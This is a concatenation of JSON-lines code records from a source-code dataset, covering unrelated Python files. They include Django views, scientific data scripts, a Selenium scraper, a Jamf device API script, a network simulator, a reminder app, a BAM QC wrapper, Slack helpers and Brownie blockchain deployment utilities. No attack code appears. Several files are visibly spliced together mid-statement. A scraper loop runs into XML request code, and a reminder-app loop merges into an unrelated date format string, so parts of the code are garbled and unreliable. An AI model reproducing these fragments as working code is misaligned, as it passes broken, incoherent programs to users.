}\n\n\n# 搜索留言的请求字典\nsearchUserLeavedMessageDict = {\n 'leaveMessageDO.userName':'', \n 'leaveMessageDO.orgName': '',\n '_search': 'false',\n 'nd': 1515138218786,\n 'rows': 2000,\n 'page': 1,\n 'sidx' : \"submitTime\",\n 'sord': 'desc'\n }\n","sub_path":"testAPI/Web_Test/Interface/QuanKeCaiJi/HouTaiGuanLi21200/SystemManager/UserLeavedMessage/UserLeavedMessagePara.py","file_name":"UserLeavedMessagePara.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"638004305","text":"#-*- coding: utf-8 -*-\n\nfrom django.db.models import Sum\nfrom django.utils import simplejson\n\nfrom dajaxice.decorators import dajaxice_register\nfrom cartel.models import ContratoPropietario, ContratoCliente, Cobro, Pago\nfrom django.db.models.aggregates import Max\n\n\n@dajaxice_register\ndef get_contrato_file(request, contrato_id,tipo=\"cliente\"):\n if tipo=='cliente':\n documento=ContratoCliente.objects.get(id=contrato_id).documento\n else:\n documento=ContratoPropietario.objects.get(id=contrato_id).documento\n return simplejson.dumps({'documento':str(documento)})\n\n#obtiene el siguiente numero de pago o de cobro\n@dajaxice_register\ndef get_siguiente(request, contrato_id,tipo=\"cobro\"):\n if tipo=='cobro':\n nro=Cobro.objects.filter(id_contrato=contrato_id).aggregate(Max('numero'))['numero__max']\n else:\n nro=Pago.objects.filter(contrato_id=contrato_id).aggregate(Max('numero'))['numero__max']\n nro= int(nro)+1 if nro else 1\n return simplejson.dumps({'nro':str(nro)})\n\n","sub_path":"cartel/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"453918615","text":"'''\nAnalyze positive/negative samples of specific labels (w their FBB coefs)\n'''\n\nimport numpy as np\nfrom tagio.tag import *\nfrom tagio.DatasetHelper import SyntheticDatasetHelper as SDH\nimport tagio.xray_data_processor as Processor\nimport os\nimport matplotlib.pyplot as plt\nimport scipy.io\n\n\ndata_dir = '/home/zquan/xray_data/nodefect_50k/'\ncoef_dir = '/home/zquan/xray_data/fbb_output/nodefect_50k/'\noutput_dir = '/home/zquan/xray_data/fbb_analysis/'\nlabel_len = 10\n\n\ndef sample(label, n_positive, n_negative):\n idx_positive = np.where(label == 1)[0]\n idx_negative = np.where(label == 0)[0]\n if idx_positive.size > n_positive:\n idx_positive = np.random.permutation(idx_positive)[:n_positive]\n if idx_negative.size > n_negative:\n idx_negative = np.random.permutation(idx_negative)[:n_negative]\n return idx_positive, idx_negative\n\n\ndef visualize(sdh, files, output_template):\n for i, f in enumerate(files):\n print('%d / %d' % (i, len(files)))\n image = scipy.io.loadmat(f)['detector_image']\n image = np.log(1 + image) / np.log(65536)\n expr, name = sdh.split_expr_name(f)\n coef_path = os.path.join(coef_dir, expr, name + '.npy')\n coef = np.reshape(np.load(coef_path), [2, 40, 11])\n amp = np.sqrt(coef[0, :, :] ** 2 + coef[1, :, :] ** 2)\n\n fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(18, 8))\n im = axes[0].imshow(image)\n ima = axes[1].imshow(amp)\n axes[2].plot(np.sum(amp, axis=0))\n fig.colorbar(im, ax=[axes[0]])\n fig.colorbar(ima, ax=[axes[1]])\n fig.suptitle(f)\n fig.savefig(output_template.format(i))\n plt.close(fig)\n\n\nif __name__ == '__main__':\n sdh = SDH(data_dir)\n l = sdh.get_image_list()\n l = np.random.permutation(l)[:5000] # sample the entire dataset\n tags = [tagdata(sdh.get_tag_from_image(x), 
tag_type=tagtype.Synthetic)\n for x in l]\n keywords = ['symmetry halo', 'symmetry ring', 'lattice.symmetry']\n\n for w in keywords:\n output_dir_w = output_dir + w + '/'\n if not os.path.isdir(output_dir_w):\n os.mkdir(output_dir_w)\n for i, t in enumerate(tags):\n if any(x.find(w) > -1 for x in t.SimulatedFeatures):\n sdh.copy_to(l[i], output_dir_w)\n\n'''\nif __name__ == '__main__':\n sdh = SDH(data_dir)\n l = sdh.get_image_list()\n l = np.random.permutation(l)[:5000] # sample the entire dataset\n tags = [tagdata(sdh.get_tag_from_image(x), tag_type=tagtype.Synthetic)\n for x in l]\n labels = np.zeros([len(l), label_len], dtype=int)\n for i, t in enumerate(tags):\n labels[i, :] = Processor.SimulatedFeatureSelectorSymmetry(t)[0, :label_len]\n\n indices = [7, 8, 9]\n for idx in indices:\n idx_positive, idx_negative = sample(labels[:, idx], 50, 50)\n if not os.path.isdir(output_dir + str(idx)):\n os.mkdir(output_dir + str(idx))\n visualize(sdh, l[idx_positive], output_dir + str(idx) + '/p-{}.png')\n visualize(sdh, l[idx_negative], output_dir + str(idx) + '/n-{}.png')\n'''\n","sub_path":"dtyu/xray_learning/analyze_fbb.py","file_name":"analyze_fbb.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"218181190","text":"\n'''\n从网页获取名字的操作。\n'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom bs4 import BeautifulSoup\nimport time,requests\n\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(2)\ndriver.maximize_window()\ndriver.get(\"http://www.qqxiuzi.cn/zh/xingming\")\ndriver.find_element(By.XPATH,\"/html/body/div[3]/p[1]/input\").click()\ntime.sleep(3)\n\n# 得到网页内容,并通过BeautSoup处理元素,将提取的文本转换成str类型\nresponse = driver.page_source\nsoup = BeautifulSoup(response,'html.parser') # 用HTML解析网页\ntag = soup.find_all('div',attrs={'id':'show'})\nstr_txt = str(tag[0].text)\n\n\n# 定义数组存放名字\nname,i = [],0\n\n# print(len(str_txt))\n# name.append(str_txt[0:3])\nwhile(i\n \n \n \n \n \n \n \n \n \n \n \n \n \"\"\"\n deviceURL = '%s/serialnumber/%s' % (apiEndpoint, import_values['serial_number'])\n # This is where the request is sent\n request = requests.put(deviceURL, data=xmlData, headers=requestHeaders, verify=verifySSL, auth=(jssAPIUsername, jssAPIPassword))\n\n if request.status_code == 201:\n successMsg = 'Cleared device %s' % (import_values['serial_number'])\n print(successMsg)\n elif request.status_code == 404:\n raise Exception(\n 'Device %s was not found in the JSS' % (import_values['serial_number'])\n )\n else:\n raise Exception(\n request.text\n )\n\n except Exception as e:\n error_reached = True\n print(e)\n\nif error_reached:\n print('Error clearing User and Location for devices')\nelse:\n print('Finished clearing User and Location for devices')\n","sub_path":"Python/computerdevices/clear_user_and_location.py","file_name":"clear_user_and_location.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"153409432","text":"from dbconnector import db_select, db_insert, db_selectAnalyser\nimport eut_pcietable\n\n\nclass eut_config:\n def __init__(self, _id):\n \"\"\"\n eut configuratoin object\n\n\n \"\"\"\n\n self.__dbSELECT = db_select.dbselect()\n self.__dbSELECTAnalyser = db_selectAnalyser.dbselect()\n self.__dbINSERT = db_insert.dbinsert()\n\n self._id = _id\n self._name = str(\"\")\n self._info = str(\"\")\n self._chassisID = int(0)\n self._chassisText = str(\"\")\n 
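# per-component fields: count, database id and resolved display name (defaults; filled by the DB loaders below)\n        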
self._moboID = int(0)\n        self._moboText = str(\"\")\n        self._hddAnz = int(0)\n        self._hddID = int(0)\n        self._hddText = str(\"\")\n        self._cpuAnz = int(0)\n        self._cpuID = int(0)\n        self._cpuText = str(\"\")\n        self._memAnz = int(0)\n        self._memID = int(0)\n        self._memText = str(\"\")\n        self._psuAnz = int(0)\n        self._psuID = int(0)\n        self._psuText = str(\"\")\n        self._pcieTableID = int(1)\n\n        # load the data record for a unique id\n        # from the database\n        self.__load_eutConfig_byID(self._id)\n        # now the matching text for each component id is loaded\n        # e.g.: cpu_id(1) -> E3-1280v3\n        # after this function every text variable should hold the matching\n        # text for its ID\n        self.__load_eutConfigNames()\n\n        # create the pcie table object from the pcieTable ID\n        self._pcieTable = eut_pcietable.eut_pcietable(self._pcieTableID)\n\n    def __load_eutConfig_byID(self, idd):\n\n        eutList_rear = self.__dbSELECT.get_configuration_byID(idd)\n        eutList = eutList_rear[0]\n\n        print(\"DEBUG: load configuration list {} - len(){} \".format(\n            eutList, len(eutList)))\n\n        self._name = str(eutList[1])\n        self._info = str(eutList[2])\n        self._chassisID = int(eutList[3])\n        self._moboID = int(eutList[4])\n        self._hddAnz = int(eutList[5])\n        self._hddID = int(eutList[6])\n        self._cpuAnz = int(eutList[7])\n        self._cpuID = int(eutList[8])\n        self._memAnz = int(eutList[9])\n        self._memID = int(eutList[10])\n        self._psuAnz = int(eutList[11])\n        self._psuID = int(eutList[12])\n        self._pcieTableID = int(eutList[13])\n\n    def __load_eutConfigNames(self):\n\n        # load the record by its id\n        rear = self.__dbSELECT.get_chassis_byID(self._chassisID)\n        # since the list contains only one element, take the first one\n        rear2 = rear[0]\n        # tuple layout (id, name, info, ...)\n        # hence read element [1] -- that is the name, e.g.: X540-T2\n        # then store it\n        self._chassisText = rear2[1]\n        # these 3 steps are repeated for every controller id\n\n        rear = self.__dbSELECT.get_MoBo_byID(self._moboID)\n        rear2 = rear[0]\n        self._moboText = rear2[1]\n\n        rear = self.__dbSELECT.get_HDD_byID(self._hddID)\n        rear2 = rear[0]\n        self._hddText = rear2[1]\n\n        rear = self.__dbSELECT.get_cpu_byID(self._cpuID)\n        rear2 = rear[0]\n        self._cpuText = rear2[1]\n\n        rear = self.__dbSELECT.get_mem_byID(self._memID)\n        rear2 = rear[0]\n        self._memText = rear2[1]\n\n        rear = self.__dbSELECT.get_psu_byID(self._psuID)\n        rear2 = rear[0]\n        self._psuText = rear2[1]\n\n    def print_info_eutConfig(self):\n\n        a = \"+-{:60}-+\"\n        b = \"| {:15}{:35}{:10} |\"\n        c = \"| {:12} | {:3} |{:3} | {:34} |\"\n\n        print(a.format(\"-\"*60))\n        print(b.format(\"config id:\", str(self._id), \"\"))\n        print(b.format(\"config name:\", self._name, \"\"))\n        print(b.format(\"config info:\", self._info, \"\"))\n        print(a.format(\"-\"*60))\n        print(c.format(\"-\", \"cnt\", \" id\", \"ctrl name\"))\n        print(a.format(\"-\"*60))\n        print(c.format(\"Chassis: \", \" -\", self._chassisID, self._chassisText))\n        print(c.format(\"MoBo: \", \" -\", self._moboID, self._moboText))\n        print(c.format(\"HDD: \", self._hddAnz, self._hddID, self._hddText))\n        print(c.format(\"CPU: \", self._cpuAnz, self._cpuID, self._cpuText))\n        print(c.format(\"Memory: \", self._memAnz, self._memID, self._memText))\n        print(c.format(\"PSU: \", self._psuAnz, self._psuID, self._psuText))\n        print(a.format(\"-\"*60))\n        print()\n\n\nif __name__ == '__main__':\n\n    a = 
eut_config(1)\n","sub_path":"taff_v1/eut_config.py","file_name":"eut_config.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"27511487","text":"# -*- encoding: utf-8 -*-\n\nfrom netCDF4 import Dataset\nimport numpy as np\nimport json\n\n\nds_by_date = Dataset('./spGIS_diario.nc4', 'r+', format=\"NETCDF4\")\n\nmaxlat = -19.74827\nminlat = -25.4562\n\nmaxlon = -44.16656\nminlon = -53.42064\n\nycellsize = (maxlat - minlat) / len(ds_by_date['latitude'])\nxcellsize = (maxlon - minlon) / len(ds_by_date['longitude'])\n\nlocale_list = json.load(open('./locales.json'))\noutput = {}\n\nfor locale in locale_list:\n    y = locale['latitude']\n    x = locale['longitude']\n\n    py = abs(int((y - minlat) / ycellsize))\n    px = abs(int((x - minlon) / xcellsize))\n\n    lat_index = ds_by_date['latitude'][py]\n    long_index = [ds_by_date['longitude'][px]]\n\n    output[locale['id']] = {}\n    for date_index, date in enumerate(ds_by_date['time']):\n        output[locale['id']][date] = {\n            \"type\": \"Point\",\n            \"coordinates\": [y, x],\n            \"properties\": {\n                \"precipitacao\": float(ds_by_date['precipitacao'][:][date_index][py][px]),\n                \"tmin\": float(ds_by_date[\"tmin\"][:][date_index][py][px]),\n                \"tmax\": float(ds_by_date[\"tmax\"][:][date_index][py][px]),\n                \"rhmax\": float(ds_by_date[\"rhmax\"][:][date_index][py][px]),\n                \"rhmin\": str(ds_by_date[\"rhmin\"][:][date_index][py][px])\n            }\n        }\n\n# json.dump needs a writable file object, not a filename string\nwith open(\"spGIS_diario.json\", \"w\") as fp:\n    json.dump(output, fp)\n\nprint(\"hgeuueh\")\n","sub_path":"base/extract_points.py","file_name":"extract_points.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"247959513","text":"\nfrom Packet import Packet\nfrom Connection import Connection\nfrom Interfaces import *\nimport Node\n\nclass Network:\n    def __init__(self):\n        # indexed by node_id\n        self.nodes = {}\n\n        #indexed by host IP address\n        self.hosts = {}\n\n        #indexed by a unique tuple of node_ids. See get_node_pair_id\n        self.connections = {}\n\n        #indexed by packet_id\n        self.packets = {}\n\n    def add_node(self, node):\n        \"\"\"\n        add a node to the network\n        \"\"\"\n        self.nodes[node.node_id] = node\n\n        if isinstance(node, Node.Node.Host):\n            self.hosts[node.get_IP_address()] = node\n\n    def get_node_pair_id(self, n1_id, n2_id):\n        return (n1_id, n2_id) if n1_id <= n2_id else (n2_id, n1_id)\n\n    # def create_messageUDP(self, startIP, endIP, messageString):\n    #     startID = self.hosts[startIP].node_id\n    #     endID = self.hosts[startIP].node_id\n    #     # TODO The IDS are not important for message creation. Should use port numbers. Fix this.\n    #     segment = UDPSegment(UDPHeader(startID, endID, 0), messageString)\n    #     self.create_message(startID, endID, segment)\n    #\n    # def create_messageTCP(self, startIP, endIP, messageString):\n    #     startID = self.hosts[startIP].node_id\n    #     endID = self.hosts[startIP].node_id\n    #     # TODO The IDS are not important for message creation. Should use port numbers. Fix this.\n    #     segment = TCPSegment(TCPHeader(startID, endID), messageString)\n    #     self.create_message(startID, endID, segment)\n    #\n    # def create_message(self, startIP, endIP, UDP_TCP_segment):\n    #     startID = self.hosts[startIP].node_id\n    #     # TODO The IDS are not important for message creation. Should use port numbers. 
Fix this.\n # ip_datagram = IPDatagram(IPHeader(startIP,endIP), UDP_TCP_segment)\n # eth_frame = EthernetFrame(EthernetHeader(startIP, endIP), ip_datagram)\n # self.add_packet(Packet(self.nodes[startID], eth_frame))\n\n \n def add_connection(self, n1_id, n2_id, connection):\n \"\"\"\n add a connection between two nodes (by id)\n \"\"\"\n pair_id = self.get_node_pair_id(n1_id, n2_id)\n self.connections[pair_id] = connection\n\n def get_connection(self, n1_id, n2_id):\n return self.connections[self.get_node_pair_id(n1_id,n2_id)]\n\n def add_packet(self, packet):\n self.packets[packet.packet_id] = packet\n\n def remove_node(self, node_id):\n \"\"\"\n remove a node by id\n \"\"\"\n\n try:\n node = self.nodes[node_id]\n del self.nodes[node_id]\n for c_id in self.connections.keys():\n if node_id in c_id:\n del self.connections[c_id]\n for p_id, packet in self.packets.iteritems():\n if node_id == packet.current_node.node_id:\n del self.packets[p_id]\n\n if isinstance(node, Host):\n del self.hosts[node.interfaces[0].IP_address]\n\n return True\n except:\n return False\n\n\n\n def remove_connection(self, n1_id, n2_id):\n \"\"\"\n remove a connection by ids of nodes\n \"\"\"\n try:\n del self.connections[self.get_node_pair_id(n1_id, n2_id)]\n return True\n except:\n return False\n\n def get_connected_nodes(self, node_id):\n \"\"\"\n returns a list of nodes connected to the given node in the form\n [{\"node\": the node at the other end, \"connection\": the connection object}]\n \"\"\"\n connected = []\n for c_id, connection in self.connections.iteritems():\n if node_id in c_id:\n other_node = c_id[0] if c_id[1] == node_id else c_id[1]\n connected.append({\"node\":other_node, \"connection\":connection})\n return connected\n\n def get_as_graph(self):\n graph = {}\n for node in self.nodes:\n graph_node = {}\n for connection in self.get_connected_nodes(node):\n graph_node[connection[\"node\"]] = connection[\"connection\"].get_latency()\n graph[node] = graph_node\n return graph\n\n def get_better_graph(self):\n # Need to include the actual node and connection objects.\n # This will allow me to replace node_id's by interface IP addresses in the table\n #quite easily.\n\n graph = {}\n for node in self.nodes.values():\n graph_node = {}\n for connected in self.get_connected_nodes(node.node_id):\n graph_node[self.nodes[connected[\"node\"]]] = connected[\"connection\"]\n graph[node] = graph_node\n\n # Also, Switches need to be removed for this to work properly.\n\n done_list = []\n graph_copy = graph.copy()\n for node in graph_copy:\n done_list = []\n if not isinstance(node, Node.Node.Router):\n for adj_node_1, adj_conn_1 in graph_copy[node].iteritems():\n adj_ints = adj_conn_1.interfaces\n far_int_1 = adj_ints[0] if adj_ints[1] in node.interfaces.values() else adj_ints[1]\n for adj_node_2, adj_conn_2 in graph_copy[node].iteritems():\n if adj_node_2 != adj_node_1 and adj_node_2 not in done_list:\n oth_adj_ints = adj_conn_2.interfaces\n far_int_2 = oth_adj_ints[0] if oth_adj_ints[1] in node.interfaces.values() else oth_adj_ints[1]\n\n new_conn = Connection(None, adj_conn_1.get_latency() + adj_conn_2.get_latency())\n new_conn.fake_connect_interfaces(far_int_1, far_int_2)\n\n graph[adj_node_1][adj_node_2] = new_conn\n graph[adj_node_2][adj_node_1] = new_conn\n\n dict = graph[adj_node_1]\n del dict[node]\n done_list.append(adj_node_1)\n del graph[node]\n return graph\n\ndef network_init():\n\n global network\n network = Network()\n Node.static_id=0\n Connection.static_id=0\n Packet.static_packet_id = 0\n 
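# also reset the interface address counters so MAC and IP numbering restarts at 1\n    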
LLInterface.static_MAC = 1\n NLInterface.static_IP = 1\n","sub_path":"src/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":6205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"34237438","text":"import sys\nimport random\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QWidget, QApplication, QLabel, QPushButton\nfrom PyQt5.QtGui import QPainter, QColor\n\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n self.qp = QPainter()\n self.status = 0\n self.setMouseTracking(True)\n self.btn = QPushButton('hehe', self)\n self.btn.clicked.connect(self.hehe)\n\n def hehe(self):\n self.status = 1\n self.update()\n\n def paintEvent(self, event):\n self.qp = QPainter()\n self.qp.begin(self)\n self.draw()\n self.qp.end()\n\n def draw(self):\n self.qp.setBrush(QColor(random.randint(0, 255),\n random.randint(0, 255), random.randint(0, 255)))\n if self.status == 1:\n self.qp.drawEllipse(random.randint(10, 200), random.randint(\n 10, 200), random.randint(10, 200), random.randint(10, 200))\n self.status = 0\n\n def initUI(self):\n self.setGeometry(300, 300, 300, 300)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n ex.show()\n sys.exit(app.exec())","sub_path":"my first repo/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"572194390","text":"from typing import List, Callable, Union\nfrom fuze.interfaces import IRecordSet, ISerializer\nfrom fuze.util import typetools\n\n\nclass RecordSet(IRecordSet):\n def __init__(self, source: Union[List, Callable], encoder: Union[ISerializer, Callable]=None):\n self._records = source if isinstance(source, list) else []\n self._columns = []\n self._adapters = {}\n self._encoder = encoder\n if self._records:\n self._inspect()\n\n def _inspect(self):\n if self._columns:\n return\n\n if self._records:\n r = self._records[0]\n if hasattr(r, \"__dict__\"):\n columns = None\n\n if hasattr(r.__class__, \"columns\"):\n columns = r.__class__.columns\n elif hasattr(r.__class__, \"meta\"):\n columns = r.__class__.meta.columns\n\n if columns:\n for x, c in enumerate(columns):\n formatter = c.formatter\n if formatter:\n self._adapters[c.name] = formatter.format\n columns[x] = c.name\n else:\n columns = [k for k in r.__dict__.keys()]\n\n elif isinstance(r, dict):\n self._columns = [k for k in r.keys()]\n else:\n raise Exception(\"Unable to determine the column names for the input records.\")\n\n def encode(self, encoder: Union[ISerializer, Callable]=None):\n if encoder:\n self._encoder = encoder\n\n if not self._encoder:\n raise Exception(\"The recordset encoder has not been specified!\")\n\n encoder = self._encoder\n if typetools.istype(encoder, \"ISerializer\"):\n if not isinstance(encoder, ISerializer):\n encoder = encoder()\n\n if isinstance(encoder, ISerializer):\n return encoder.encode(self)\n return encoder(self._records)\n\n @property\n def records(self):\n return self._records\n\n @property\n def columns(self):\n return self._columns\n\n @property\n def adapters(self):\n return self._adapters\n\n @property\n def type(self):\n if not hasattr(self, \"_rt\"):\n if self._records:\n try:\n rt = self._records[0].__class__.__name__\n setattr(self, \"_rt\", rt)\n except:\n pass\n return getattr(self, \"_rt\", None)\n\n def __iter__(self):\n for r in self._records:\n yield r\n\n def __len__(self):\n 
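# container protocol: the length of a RecordSet is the size of its backing list\n        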
return len(self._records)\n\n def __str__(self):\n rt = self.type\n if rt:\n return \"Recordset[{}] - {} records\".format(rt, len(self._records))\n return \"Recordset - {} records\".format(len(self._records))\n\n def __repr__(self):\n return self.__str__()","sub_path":"fuze/containers/recordset.py","file_name":"recordset.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"424300579","text":"import spacy\nfrom spacy.matcher import Matcher\n\nnlp = spacy.load(\"es_core_news_sm\")\nmatcher = Matcher(nlp.vocab)\n\ndoc = nlp(\n \"descargué Fortnite en mi computadora, pero no puedo abrir el juego. \"\n \"Ayuda? Cuando estaba descargando Minecraft, conseguí la versión de Windows \"\n \"donde tiene una carpeta '.zip' y usé el programa por defecto para \"\n \"descomprimirlo…así que también tengo que descargar Winzip?\"\n)\n\n# Escribe un patrón que encuentre una forma de \"descargar\" más un nombre propio\npattern = [{\"LEMMA\": ____}, {\"POS\": ____}]\n\n# Añade el patrón al matcher y usa el matcher sobre el documento\nmatcher.add(\"DOWNLOAD_THINGS_PATTERN\", None, pattern)\nmatches = matcher(doc)\nprint(\"Total de resultados encontrados:\", len(matches))\n\n# Itera sobre los resultados e imprime el texto del span\nfor match_id, start, end in matches:\n print(\"Resultado encontrado:\", doc[start:end].text)\n","sub_path":"exercises/es/exc_01_12_02.py","file_name":"exc_01_12_02.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"333551542","text":"from threading import Thread\r\nfrom time import sleep\r\nimport datetime\r\nimport time\r\nimport sys\r\nimport create\r\nimport delete\r\nimport edit\r\nimport display\r\nfrom tkinter import messagebox\r\nimport mysql.connector\r\nconn = mysql.connector.connect(user=\"root\",password=\"\",host = \"localhost\", database=\"reminderDB\")\r\nmycursor = conn.cursor()\r\n\r\n\r\ndef menu():\r\n while (1):\r\n print(\"Menu\")\r\n print(\"1. View \\n2. Create\\n3. Update\\n4. 
Delete\")\r\n option = input(\"Enter option : \")\r\n\r\n if option == \"1\":\r\n display.display()\r\n elif option == \"2\":\r\n create.create()\r\n elif option == \"3\":\r\n edit.edit()\r\n elif option == \"4\":\r\n delete.delete()\r\n else:\r\n print(\"Enter a valid option\")\r\n\r\ndef timer():\r\n while (1):\r\n #print(\"working\")\r\n mycursor.execute(\"SELECT MIN(DateTime) FROM reminder\")\r\n min = mycursor.fetchone()\r\n min_list = list(min)\r\n min_res_min = min_list[0].strftime(\"%Y-%m-%d %H:%M\")\r\n timeNow = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\") #seconds\r\n\r\n while(min_res_min2}-{2:0>2}'.format(\n row['CaseDate'].year, row['CaseDate'].month, row['CaseDate'].day\n ),\n string_utils.xstr(row['PatientKey']),\n string_utils.xstr(row['Name']),\n string_utils.xstr(row['DiseaseCode1']),\n string_utils.xstr(row['DiseaseName1']),\n string_utils.xstr(row['Card']),\n string_utils.xstr(row['Continuance']),\n string_utils.xstr(row['Treatment']),\n ','.join(treats),\n treat_signature,\n string_utils.xstr(row['Doctor']),\n ', '.join(error_messages),\n ]\n for column_no in range(len(medical_record)):\n self.ui.tableWidget_prescript.setItem(\n row_no, column_no,\n QtWidgets.QTableWidgetItem(medical_record[column_no])\n )\n if column_no in [2]:\n self.ui.tableWidget_prescript.item(\n row_no, column_no).setTextAlignment(\n QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter\n )\n elif column_no in [7]:\n self.ui.tableWidget_prescript.item(\n row_no, column_no).setTextAlignment(\n QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter\n )\n if len(error_messages) > 0:\n color = QtGui.QColor('red')\n self.ui.tableWidget_prescript.item(row_no, column_no).setForeground(color)\n\n def _get_ins_treat(self, case_key):\n treat_list = []\n\n sql = '''\n SELECT * FROM prescript WHERE\n CaseKey = {0} AND\n MedicineSet = 1 AND\n MedicineType IN (\"穴道\", \"處置\")\n ORDER BY MedicineName\n '''.format(case_key)\n rows = self.database.select_record(sql)\n\n for row in rows:\n if row['MedicineName'] is None:\n continue\n\n treat_list.append(row['MedicineName'])\n\n return treat_list\n","sub_path":"check_ins_treat.py","file_name":"check_ins_treat.py","file_ext":"py","file_size_in_byte":9435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"147846255","text":"import cbio\nimport os\n\n\ndef bam_qc(input_files, output_file, config):\n \"\"\"\n Map fastq sequences against reference genome.\n \"\"\"\n\n bam_path = input_files[0]\n roi_path = input_files[1]\n\n REFERENCE_GENOME = config['ref'][config['conf']['build']]\n\n # bedtools qc software to generate information file\n picard_qc_cmd = 'java -jar ' + config['software']['paths']['PICARDPATH'] +\\\n ' CollectAlignmentSummaryMetrics ' +\\\n ' R=' + REFERENCE_GENOME +\\\n ' I=' + bam_path +\\\n ' O=' + output_file\n\n # Run command\n cbio.utils.run_cmd(picard_qc_cmd, 1)\n\n # BWA mapping software to generate sam file\n picard_qc_cmd_list = 'java -jar ' + config['software']['paths']['PICARDPATH'] +\\\n ' BedToIntervalList ' +\\\n ' I=' + roi_path +\\\n ' O=' + roi_path.replace('.bed', '.list') +\\\n ' SD=' + REFERENCE_GENOME.replace('.fa', '.dict')\n\n # Run command\n print(picard_qc_cmd_list)\n cbio.utils.run_cmd(picard_qc_cmd_list, 1)\n\n # BWA mapping software to generate sam file\n picard_qc_cmd_2 = 'java -jar ' + config['software']['paths']['PICARDPATH'] +\\\n ' CollectTargetedPcrMetrics ' +\\\n ' I=' + bam_path +\\\n ' O=' + output_file.strip('.txt') + '_2.txt' +\\\n ' TI=' + roi_path.replace('.bed', 
'.list') +\\\n ' AI=' + roi_path.replace('.bed', '.list')\n\n print(picard_qc_cmd_2)\n # Run command\n cbio.utils.run_cmd(picard_qc_cmd_2, 1)\n","sub_path":"mods/workflow/processes/bamqc.py","file_name":"bamqc.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"401402666","text":"import slack\nimport os\n\n\n# Load env variables and initialize slack python client\ndef initialize_slack_client():\n global slack_reporter_token, slack_channel_ID, slack_client\n slack_reporter_token = os.environ[\"SLACK_API_TOKEN\"]\n slack_channel_ID = os.environ[\"SLACK_CHANNEL\"]\n slack_client = slack.WebClient(token=slack_reporter_token)\n\n\n# Post messages and failures in slack\ndef post_message_in_slack(slack_message):\n slack_client.chat_postMessage(\n channel=slack_channel_ID,\n link_names=True,\n text=slack_message\n )\n\n\n# Get members of a channel\ndef get_channel_members():\n return slack_client.conversations_members(\n channel=slack_channel_ID\n )\n","sub_path":"cerberus/slack/slack_client.py","file_name":"slack_client.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"391325160","text":"from brownie import (\n network,\n accounts,\n config,\n MockV3Aggregator,\n Contract,\n VRFCoordinatorMock,\n LinkToken,\n interface,\n)\n\nFORKED_LOCAL_ENVIRONMENTS = [\"mainnet-fork\", \"mainnet-fork-dev\"]\nLOCAL_BLOCKCHAIN_ENVIRONMENTS = [\"development\", \"ganache-local\"]\n\n\ndef getAccount(index=None, id=None):\n # accounts[0]\n # accounts.add(\"env\")\n # accounts.load(\"id\")\n if index:\n return accounts[index]\n if id:\n return accounts.load(id)\n if (\n network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS\n or network.show_active() in FORKED_LOCAL_ENVIRONMENTS\n ):\n return accounts[0]\n else:\n return accounts.add(config[\"wallets\"][\"from_key\"])\n\n\ncontract_to_mock = {\n \"eth_usd_price_feed\": MockV3Aggregator,\n \"vrf_coordinator\": VRFCoordinatorMock,\n \"link_token\": LinkToken,\n}\n\n\ndef get_contract(contract_name):\n contract_type = contract_to_mock[contract_name]\n if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n if len(contract_type) <= 0:\n # MockV3Aggregator\n deploy_mocks()\n contract = contract_type[-1]\n # MockV3Aggregator[-1]\n else:\n contract_address = config[\"networks\"][network.show_active()][contract_name]\n # address\n # ABI\n contract = Contract.from_abi(\n contract_type._name, contract_address, contract_type.abi\n )\n # MockV3Aggregator.abi\n return contract\n\n\nDECIMALS = 8\nINITIAL_VALUE = 200000000000\n\n\ndef deploy_mocks():\n account = getAccount()\n mock_price_feed = MockV3Aggregator.deploy(\n DECIMALS, INITIAL_VALUE, {\"from\": account}\n )\n link_token = LinkToken.deploy({\"from\": account})\n VRFCoordinatorMock.deploy(link_token.address, {\"from\": account})\n print(\"Deployed!\")\n\n\ndef fund_with_link(\n _contract_address, _account=None, _link_token=None, _amount=100000000000000000\n):\n # 0.1 LINK\n account = _account if _account else getAccount()\n link_token = _link_token if _link_token else get_contract(\"link_token\")\n tx = link_token.transfer(_contract_address, _amount, {\"from\": account})\n # link_token_contract = 